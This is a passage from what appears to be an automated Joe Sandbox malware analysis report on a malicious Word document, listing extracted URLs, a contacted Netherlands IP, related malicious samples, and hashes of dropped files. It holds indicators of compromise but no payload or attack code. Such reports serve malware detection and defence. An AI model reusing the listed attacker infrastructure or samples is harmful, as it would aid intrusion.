          https://shell.suite.office.com:1443FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drfalse
            		high
            https://bugs.launchpad.net/ubuntu/678899CC.htm.0.dr, Glomet[1].htm.0.dr, FF013E73.htm.0.drfalse
              		high
              https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorizeFB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drfalse
                		high
                https://autodiscover-s.outlook.com/FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drfalse
                  		high
                  https://roaming.edog.FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drfalse
                  • URL Reputation: safe
                  		unknown
                  https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=FlickrFB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drfalse
                    		high
                    https://cdn.entity.FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drfalse
                    • URL Reputation: safe
                    		unknown
                    https://api.addins.omex.office.net/appinfo/queryFB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drfalse
                      		high
                      https://clients.config.office.net/user/v1.0/tenantassociationkeyFB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drfalse
                        		high
                        https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drfalse
                          		high
                          https://powerlift.acompli.netFB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drfalse
                          • URL Reputation: safe
                          		unknown
                          https://rpsticket.partnerservices.getmicrosoftkey.comFB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drfalse
                          • URL Reputation: safe
                          		unknown
                          https://lookup.onenote.com/lookup/geolocation/v1FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drfalse
                            		high
                            https://cortana.aiFB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drfalse
                            • URL Reputation: safe
                            		unknown
                            https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeechFB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drfalse
                              		high
                              https://cloudfiles.onenote.com/upload.aspxFB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drfalse
                                		high
                                https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFileFB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drfalse
                                  		high
                                  https://entitlement.diagnosticssdf.office.comFB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drfalse
                                    		high
                                    https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicyFB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drfalse
                                      		high
                                      https://api.aadrm.com/FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drfalse
                                      • URL Reputation: safe
                                      		unknown
                                      http://creativecommons.org/ns#DerivativeWorksbattery-level-90-charging-symbolic.svg.29.drfalse
                                        		high
                                        https://ofcrecsvcapi-int.azurewebsites.net/FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drfalse
                                        • URL Reputation: safe
                                        		unknown
                                        http://creativecommons.org/licenses/by-sa/4.0/battery-level-90-charging-symbolic.svg.29.drfalse
                                          		high
                                          https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPoliciesFB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drfalse
                                            		high
                                            https://api.microsoftstream.com/api/FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drfalse
                                              		high
                                              https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=ImmersiveFB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drfalse
                                                		high
                                                https://cr.office.comFB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drfalse
                                                  		high
                                                  https://augloop.office.com;https://augloop-int.officeppe.com;https://augloop-dogfood.officeppe.com;hFB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drfalse
                                                  • Avira URL Cloud: safe
                                                  		low
                                                  https://portal.office.com/account/?ref=ClientMeControlFB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drfalse
                                                    		high
                                                    https://graph.ppe.windows.netFB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drfalse
                                                      		high
                                                      https://res.getmicrosoftkey.com/api/redemptioneventsFB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drfalse
                                                      • URL Reputation: safe
                                                      		unknown
                                                      https://powerlift-frontdesk.acompli.netFB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drfalse
                                                      • URL Reputation: safe
                                                      		unknown
                                                      https://tasks.office.comFB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drfalse
                                                        		high
                                                        https://officeci.azurewebsites.net/api/FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drfalse
                                                        • URL Reputation: safe
                                                        		unknown
                                                        https://sr.outlook.office.net/ws/speech/recognize/assistant/workFB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drfalse
                                                          		high
                                                          https://store.office.cn/addinstemplateFB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drfalse
                                                          • URL Reputation: safe
                                                          		unknown
                                                          https://api.aadrm.comFB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drfalse
                                                          • URL Reputation: safe
                                                          		unknown
                                                          http://httpd.apache.org/docs/2.4/mod/mod_userdir.html678899CC.htm.0.dr, Glomet[1].htm.0.dr, FF013E73.htm.0.drfalse
                                                            		high
                                                            https://outlook.office.com/autosuggest/api/v1/init?cvid=FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drfalse
                                                              		high
                                                              https://globaldisco.crm.dynamics.comFB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drfalse
                                                                		high
                                                                https://messaging.engagement.office.com/FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drfalse
                                                                  		high
                                                                  https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeechFB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drfalse
                                                                    		high
                                                                    https://dev0-api.acompli.net/autodetectFB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drfalse
                                                                    • URL Reputation: safe
                                                                    		unknown
                                                                    http://creativecommons.org/ns#ShareAlikebattery-level-90-charging-symbolic.svg.29.drfalse
                                                                      		high
                                                                      https://www.odwebp.svc.msFB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drfalse
                                                                      • URL Reputation: safe
                                                                      		unknown
                                                                      https://api.diagnosticssdf.office.com/v2/feedbackFB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drfalse
                                                                        		high
                                                                        https://api.powerbi.com/v1.0/myorg/groupsFB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drfalse
                                                                          		high
                                                                          https://web.microsoftstream.com/video/FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drfalse
                                                                            		high
                                                                            http://nsis.sf.net/NSIS_ErrorErrorGlomet.exe, 0000001D.00000002.576133488.000000000040A000.00000004.00000001.01000000.0000000C.sdmp, Glomet.exe, 0000001D.00000000.532501421.000000000040A000.00000008.00000001.01000000.0000000C.sdmpfalse
                                                                              		high
                                                                              https://api.addins.store.officeppe.com/addinstemplateFB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drfalse
                                                                              • URL Reputation: safe
                                                                              		unknown
                                                                              https://graph.windows.netFB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drfalse
                                                                                		high
                                                                                https://dataservice.o365filtering.com/FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drfalse
                                                                                • URL Reputation: safe
                                                                                		unknown
                                                                                https://officesetup.getmicrosoftkey.comFB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drfalse
                                                                                • URL Reputation: safe
                                                                                		unknown
                                                                                https://analysis.windows.net/powerbi/apiFB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drfalse
                                                                                  		high
                                                                                  https://prod-global-autodetect.acompli.net/autodetectFB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drfalse
                                                                                  • URL Reputation: safe
                                                                                  		unknown
                                                                                  https://outlook.office365.com/autodiscover/autodiscover.jsonFB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drfalse
                                                                                    		high
                                                                                    http://nsis.sf.net/NSIS_ErrorGlomet.exe, Glomet.exe, 0000001D.00000002.576133488.000000000040A000.00000004.00000001.01000000.0000000C.sdmp, Glomet.exe, 0000001D.00000000.532501421.000000000040A000.00000008.00000001.01000000.0000000C.sdmpfalse
                                                                                      		high
                                                                                      https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-iosFB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drfalse
                                                                                        		high
                                                                                        https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeechFB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drfalse
                                                                                          		high
                                                                                          https://learningtools.onenote.com/learningtoolsapi/v2.0/GetvoicesFB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drfalse
                                                                                            		high
                                                                                            https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.jsonFB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drfalse
                                                                                              		high
                                                                                              https://ncus.contentsync.FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drfalse
                                                                                              • URL Reputation: safe
                                                                                              		unknown
                                                                                              https://onedrive.live.com/about/download/?windows10SyncClientInstalled=falseFB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drfalse
                                                                                                		high
                                                                                                https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drfalse
                                                                                                  		high
                                                                                                  http://weather.service.msn.com/data.aspxFB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drfalse
                                                                                                    		high
                                                                                                    https://apis.live.net/v5.0/FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drfalse
                                                                                                    • URL Reputation: safe
                                                                                                    		unknown
                                                                                                    https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asksFB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drfalse
                                                                                                      		high
                                                                                                      http://creativecommons.org/ns#Noticebattery-level-90-charging-symbolic.svg.29.drfalse
                                                                                                        		high
                                                                                                        http://creativecommons.org/ns#Reproductionbattery-level-90-charging-symbolic.svg.29.drfalse
                                                                                                          		high
                                                                                                          https://word.uservoice.com/forums/304948-word-for-ipad-iphone-iosFB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drfalse
                                                                                                            		high
                                                                                                            https://messaging.lifecycle.office.com/FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drfalse
                                                                                                              		high
                                                                                                              https://autodiscover-s.outlook.com/autodiscover/autodiscover.xmlFB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drfalse
                                                                                                                		high
                                                                                                                https://management.azure.comFB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drfalse
                                                                                                                  		high
                                                                                                                  https://outlook.office365.comFB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drfalse
                                                                                                                    		high
                                                                                                                    https://wus2.contentsync.FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drfalse
                                                                                                                    • URL Reputation: safe
                                                                                                                    		unknown
                                                                                                                    https://incidents.diagnostics.office.comFB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drfalse
                                                                                                                      		high
                                                                                                                      https://clients.config.office.net/user/v1.0/iosFB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drfalse
                                                                                                                        		high
                                                                                                                        https://insertmedia.bing.office.net/odc/insertmediaFB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drfalse
                                                                                                                          		high
                                                                                                                          https://o365auditrealtimeingestion.manage.office.comFB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drfalse
                                                                                                                            		high
                                                                                                                            https://outlook.office365.com/api/v1.0/me/ActivitiesFB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drfalse
                                                                                                                              		high
                                                                                                                              https://api.office.netFB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drfalse
                                                                                                                                		high
                                                                                                                                https://incidents.diagnosticssdf.office.comFB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drfalse
                                                                                                                                  		high
                                                                                                                                  https://asgsmsproxyapi.azurewebsites.net/FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drfalse
                                                                                                                                  • URL Reputation: safe
                                                                                                                                  		unknown
                                                                                                                                  https://clients.config.office.net/user/v1.0/android/policiesFB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drfalse
                                                                                                                                    		high
                                                                                                                                    https://entitlement.diagnostics.office.comFB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drfalse
                                                                                                                                      		high
                                                                                                                                      https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.jsonFB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drfalse
                                                                                                                                        		high
                                                                                                                                        https://substrate.office.com/search/api/v2/initFB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drfalse
                                                                                                                                          		high
                                                                                                                                          https://outlook.office.com/FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drfalse
                                                                                                                                            		high
                                                                                                                                            https://storage.live.com/clientlogs/uploadlocationFB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drfalse
                                                                                                                                              		high
                                                                                                                                              https://outlook.office365.com/FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drfalse
                                                                                                                                                		high
                                                                                                                                                https://webshell.suite.office.comFB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drfalse
                                                                                                                                                  		high
                                                                                                                                                  https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDriveFB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drfalse
                                                                                                                                                    		high
                                                                                                                                                    https://substrate.office.com/search/api/v1/SearchHistoryFB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drfalse
                                                                                                                                                      		high
                                                                                                                                                      http://creativecommons.org/ns#Distributionbattery-level-90-charging-symbolic.svg.29.drfalse
                                                                                                                                                        		high
                                                                                                                                                        https://launchpad.net/bugs/1288690678899CC.htm.0.dr, Glomet[1].htm.0.dr, FF013E73.htm.0.drfalse
                                                                                                                                                          		high
                                                                                                                                                          https://management.azure.com/FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F.0.drfalse
                                                                                                                                                            		high

                                                                                                                                                            World Map of Contacted IPs

                                                                                                                                                            • No. of IPs < 25%
                                                                                                                                                            • 25% < No. of IPs < 50%
                                                                                                                                                            • 50% < No. of IPs < 75%
                                                                                                                                                            • 75% < No. of IPs

                                                                                                                                                            Public IPs

                                                                                                                                                            IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                            45.141.237.18
                                                                                                                                                            		unknownNetherlands
                                                                                                                                                            		62068SPECTRAIPSpectraIPBVNLfalse

                                                                                                                                                            Private

                                                                                                                                                            IP
                                                                                                                                                            192.168.2.1

                                                                                                                                                            General Information

                                                                                                                                                            Joe Sandbox Version:35.0.0 Citrine
                                                                                                                                                            Analysis ID:665041
                                                                                                                                                            Start date and time: 15/07/202215:25:112022-07-15 15:25:11 +02:00
                                                                                                                                                            Joe Sandbox Product:CloudBasic
                                                                                                                                                            Overall analysis duration:0h 8m 25s
                                                                                                                                                            Hypervisor based Inspection enabled:false
                                                                                                                                                            Report type:full
                                                                                                                                                            Sample file name:20220714 DWG.doc
                                                                                                                                                            Cookbook file name:defaultwindowsofficecookbook.jbs
                                                                                                                                                            Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                                                                            Run name:Potential for more IOCs and behavior
                                                                                                                                                            Number of analysed new started processes analysed:36
                                                                                                                                                            Number of new started drivers analysed:1
                                                                                                                                                            Number of existing processes analysed:0
                                                                                                                                                            Number of existing drivers analysed:0
                                                                                                                                                            Number of injected processes analysed:0
                                                                                                                                                            Technologies:
                                                                                                                                                            • HCA enabled
                                                                                                                                                            • EGA enabled
                                                                                                                                                            • HDC enabled
                                                                                                                                                            • AMSI enabled
                                                                                                                                                            Analysis Mode:default
                                                                                                                                                            Analysis stop reason:Timeout
                                                                                                                                                            Detection:MAL
                                                                                                                                                            Classification:mal72.expl.winDOC@20/52@0/2
                                                                                                                                                            EGA Information:
                                                                                                                                                            • Successful, ratio: 100%
                                                                                                                                                            HDC Information:
                                                                                                                                                            • Successful, ratio: 100% (good quality ratio 96.5%)
                                                                                                                                                            • Quality average: 84.5%
                                                                                                                                                            • Quality standard deviation: 24.6%
                                                                                                                                                            HCA Information:
                                                                                                                                                            • Successful, ratio: 100%
                                                                                                                                                            • Number of executed functions: 44
                                                                                                                                                            • Number of non-executed functions: 24
                                                                                                                                                            Cookbook Comments:
                                                                                                                                                            • Found application associated with file extension: .doc
                                                                                                                                                            • Adjust boot time
                                                                                                                                                            • Enable AMSI
                                                                                                                                                            • Found Word or Excel or PowerPoint or XPS Viewer
                                                                                                                                                            • Attach to Office via COM
                                                                                                                                                            • Scroll down
                                                                                                                                                            • Close Viewer

                                                                                                                                                            Warnings

                                                                                                                                                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, sdiagnhost.exe, mrxdav.sys, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                                                                                                                                            • Excluded IPs from analysis (whitelisted): 23.211.6.115, 52.109.76.141, 52.109.76.34, 52.109.12.24, 52.109.88.37, 52.109.76.35, 52.152.110.14, 20.54.89.106, 20.223.24.244, 40.125.122.176
                                                                                                                                                            • Excluded domains from analysis (whitelisted): www.bing.com, fs.microsoft.com, prod-w.nexus.live.com.akadns.net, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, prod.configsvc1.live.com.akadns.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, store-images.s-microsoft.com-c.edgekey.net, arc.msn.com, e12564.dspb.akamaiedge.net, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, login.live.com, store-images.s-microsoft.com, config.officeapps.live.com, sls.update.microsoft.com, nexus.officeapps.live.com, officeclient.microsoft.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, europe.configsvc1.live.com.akadns.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net, glb.sls.prod.dcat.dsp.trafficmanager.net
                                                                                                                                                            • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                            • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                            • Report size getting too big, too many NtOpenFile calls found.
                                                                                                                                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                            • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                                                                                                            • Report size getting too big, too many NtQueryValueKey calls found.

                                                                                                                                                            Simulations

                                                                                                                                                            Behavior and APIs

                                                                                                                                                            TimeTypeDescription
                                                                                                                                                            15:27:15API Interceptor20x Sleep call for process: splwow64.exe modified
                                                                                                                                                            15:28:30API Interceptor1x Sleep call for process: Glomet.exe modified

                                                                                                                                                            Joe Sandbox View / Context

                                                                                                                                                            IPs

                                                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                            45.141.237.1820220714 DWG.docGet hashmaliciousBrowse

                                                                                                                                                              Domains

                                                                                                                                                              No context

                                                                                                                                                              ASNs

                                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                              SPECTRAIPSpectraIPBVNL20220714 DWG.docGet hashmaliciousBrowse
                                                                                                                                                              • 45.141.237.18
                                                                                                                                                              5fH6UHOtIP.exeGet hashmaliciousBrowse
                                                                                                                                                              • 45.141.237.38
                                                                                                                                                              mVEt1KUk0P.exeGet hashmaliciousBrowse
                                                                                                                                                              • 45.141.237.38
                                                                                                                                                              RFQ 220234567232.exeGet hashmaliciousBrowse
                                                                                                                                                              • 185.244.36.213
                                                                                                                                                              QhZOQYbYsp.exeGet hashmaliciousBrowse
                                                                                                                                                              • 45.141.237.38
                                                                                                                                                              New Order PO-910357-2022.exeGet hashmaliciousBrowse
                                                                                                                                                              • 185.244.36.213
                                                                                                                                                              Overdue_INVOICE.exeGet hashmaliciousBrowse
                                                                                                                                                              • 185.244.36.213
                                                                                                                                                              Book1.xlsxGet hashmaliciousBrowse
                                                                                                                                                              • 45.141.239.97
                                                                                                                                                              O8W3KheXAL.exeGet hashmaliciousBrowse
                                                                                                                                                              • 45.141.237.38
                                                                                                                                                              2459694049ABFE227DDCF5B4D813FE3AE8E1E9066DE52.exeGet hashmaliciousBrowse
                                                                                                                                                              • 45.141.237.38
                                                                                                                                                              HH1l4m570n.exeGet hashmaliciousBrowse
                                                                                                                                                              • 45.141.237.38
                                                                                                                                                              uuPLi56X43.exeGet hashmaliciousBrowse
                                                                                                                                                              • 45.141.237.38
                                                                                                                                                              sample catalog2022.xlsxGet hashmaliciousBrowse
                                                                                                                                                              • 45.141.239.93
                                                                                                                                                              ERX.exeGet hashmaliciousBrowse
                                                                                                                                                              • 45.141.239.47
                                                                                                                                                              khAdJzEqMD.exeGet hashmaliciousBrowse
                                                                                                                                                              • 45.141.237.38
                                                                                                                                                              9ferD3Hp63.exeGet hashmaliciousBrowse
                                                                                                                                                              • 45.141.237.38
                                                                                                                                                              bzf7FH9FSp.exeGet hashmaliciousBrowse
                                                                                                                                                              • 45.141.237.38
                                                                                                                                                              Order -52 DBNPA.xlsxGet hashmaliciousBrowse
                                                                                                                                                              • 45.141.239.26
                                                                                                                                                              RFQ LIST UPDATE.xlsxGet hashmaliciousBrowse
                                                                                                                                                              • 45.141.239.26
                                                                                                                                                              gwmg0uFoYi.exeGet hashmaliciousBrowse
                                                                                                                                                              • 45.141.237.38

                                                                                                                                                              JA3 Fingerprints

                                                                                                                                                              No context

                                                                                                                                                              Dropped Files

                                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                              C:\Users\user\AppData\Local\Temp\nsb11EA.tmp\nsExec.dllE-dekont.exeGet hashmaliciousBrowse
                                                                                                                                                                Requirements.exeGet hashmaliciousBrowse
                                                                                                                                                                  Ziraat Bankasi Swift Mesaji.exeGet hashmaliciousBrowse
                                                                                                                                                                    Ziraat Bankasi Swift Mesaji.exeGet hashmaliciousBrowse
                                                                                                                                                                      SecuriteInfo.com.Trojan.Win32.Wacatac.Bml.26675.exeGet hashmaliciousBrowse
                                                                                                                                                                        SecuriteInfo.com.Variant.Tedy.166527.30135.exeGet hashmaliciousBrowse
                                                                                                                                                                          SecuriteInfo.com.ArtemisF2FD6E65491E.4347.exeGet hashmaliciousBrowse

                                                                                                                                                                            Created / dropped Files

                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Office\16.0\OfficeFileCache\CentralTable.accdb

                                                                                                                                                                            Download File
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                            File Type:Microsoft Access Database
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):528384
                                                                                                                                                                            Entropy (8bit):0.4761098519323635
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:384:jGfXAIeJCOU8SF7fZ0jGBdph7FgW3wtZ1IN+hVZO4Fg:afXHOCdHrZ/VT3/uI
                                                                                                                                                                            MD5:B187BF45B74E001B745E6960A8DF9FD1
                                                                                                                                                                            SHA1:B4F844BFFFEEA143A94E1F4FB20CA58D5FDC3298
                                                                                                                                                                            SHA-256:65172B26A326C3B2402A3A9DF1C441EBC80D15283F8CB81D70111F2B470E53ED
                                                                                                                                                                            SHA-512:EBE2C79F543FEBA142270232F1408235724D4E7EF1D9CFCAED9B8C953668F4D6E92DE72AFDC5448DA3E7DF4315DCAFECC75DF05C9B2C389D9D64AB9E7116651B
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:....Standard ACE DB......n.b`..U.gr@?..~.....1.y..0...c...F...NSU.7.....(....`.:{6 ...Z.C...3..y[G.|*..|.....l."...f_...$.g..'D...e....F.x....-b.T...4.0.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Office\16.0\OfficeFileCache\CentralTable.ini

                                                                                                                                                                            Download File
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                            File Type:data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):36
                                                                                                                                                                            Entropy (8bit):2.730660070105504
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:3:5NixJlElGUR:WrEcUR
                                                                                                                                                                            MD5:1F830B53CA33A1207A86CE43177016FA
                                                                                                                                                                            SHA1:BDF230E1F33AFBA5C9D5A039986C6505E8B09665
                                                                                                                                                                            SHA-256:EAF9CDC741596275E106DDDCF8ABA61240368A8C7B0B58B08F74450D162337EF
                                                                                                                                                                            SHA-512:502248E893FCFB179A50863D7AC1866B5A466C9D5781499EBC1D02DF4F6D3E07B9E99E0812E747D76734274BD605DAD6535178D6CE06F08F1A02AB60335DE066
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:C.e.n.t.r.a.l.T.a.b.l.e...a.c.c.d.b.

                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Office\16.0\OfficeFileCache\CentralTable.laccdb

                                                                                                                                                                            Download File
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                            File Type:data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):64
                                                                                                                                                                            Entropy (8bit):1.4172860556164644
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:3:EvaV:Evu
                                                                                                                                                                            MD5:E7C929668B21759DDDF8C60D82A00E1F
                                                                                                                                                                            SHA1:ED7AB62092D3871207D763C183D023226C6ACC20
                                                                                                                                                                            SHA-256:7B5138F519F103E0F3E0EACE4B35C8215A34402CC9D6387B1AEE0D75FC7415FB
                                                                                                                                                                            SHA-512:C8CB18E27CF613E1B50DEF87F647FFC2EB5ACA32CB97D01661167D9926461C779B887B1DA2DFC1D08A94A0FDC29406B9C16AF5C456498582FFE42B81C0551149
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:445817. Admin.

                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\FB6DECAC-D518-44FC-A2B0-E6C0B9BDC76F

                                                                                                                                                                            Download File
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                            File Type:XML 1.0 document, UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):149155
                                                                                                                                                                            Entropy (8bit):5.356500351027788
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:1536:acQW/gxgB5BQguw5/Q9DQC+zQWk4F77nXmvid3Xx5ETLKz6e:lJQ9DQC+zPXwI
                                                                                                                                                                            MD5:DB5B9DDF239C38EB448E5019F23C8DDD
                                                                                                                                                                            SHA1:72D82BBDDED65ABDF4349A634EA34DB93BF84985
                                                                                                                                                                            SHA-256:A446051C75A1FB66A0B7E7F04D3CD15EDFCF0F9210F1F4E9616723AB7657D3D9
                                                                                                                                                                            SHA-512:BC038931FDAA019DD902FB3596867D7590E15F5BB039C0C93122588FE5F8858DBF1A8594645EA16FC84DEFB2C2B37488480383646A5C630169A42140773F259B
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:<?xml version="1.0" encoding="utf-8"?>..<o:OfficeConfig xmlns:o="urn:schemas-microsoft-com:office:office">.. <o:services o:GenerationTime="2022-07-15T13:26:34">.. Build: 16.0.15510.30526-->.. <o:default>.. <o:ticket o:headerName="Authorization" o:headerValue="{}" />.. </o:default>.. <o:service o:name="Research">.. <o:url>https://rr.office.microsoft.com/research/query.asmx</o:url>.. </o:service>.. <o:service o:name="ORedir">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ORedirSSL">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ClViewClientHelpId">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientHome">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientTemplate">.. <o:url>https://ocsa.office.microsoft.com/client/15/help/template</o:url>.. </o:service>.. <o:

                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\678899CC.htm

                                                                                                                                                                            Download File
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
